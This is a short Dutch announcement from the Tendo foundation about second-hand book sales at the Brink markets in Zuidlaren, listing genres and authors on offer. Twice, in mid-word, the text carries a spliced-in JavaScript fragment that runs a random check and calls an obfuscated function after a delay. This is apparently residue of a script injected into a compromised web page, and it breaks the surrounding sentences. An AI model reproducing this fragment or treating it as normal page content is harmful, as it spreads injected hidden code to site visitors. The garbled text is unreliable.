Boekenverkoop Tendo

boekenVanaf 15 juli a.s. worden op 4 achtereenvolgende woensdagen (van 11 – 18 uur) Brinkmarkten gehouden, waar Tendo haar prachtige voorraad 2e handandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s boeken te koop aanbiedt.
Tussendoor is er op zaterdag 1 augustus de markt voor Melk en Honing, ook op de Brink in Zuidlaren. Tendo heeft veel moois in de aanbieding, waaronder veel boeken uit het genre ‘spanning’ (o.a.  Henning Mankell en Ludlum), veel streekromans van bekende Nederlandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}se schrijfsters, maar ook themaboeken als kook, natuur en religie, zijn volop te koop.
Naast al deze mooie en goede lectuur hebben we nog enkele complete series, van o.a. Karl May, Maigret  en Baantjer.
Dus voor al uw (vakantie)leesplezier: kom naar één van de markten op de Brink in Zuidlaren en bezoek de kraam van stichting Tendo.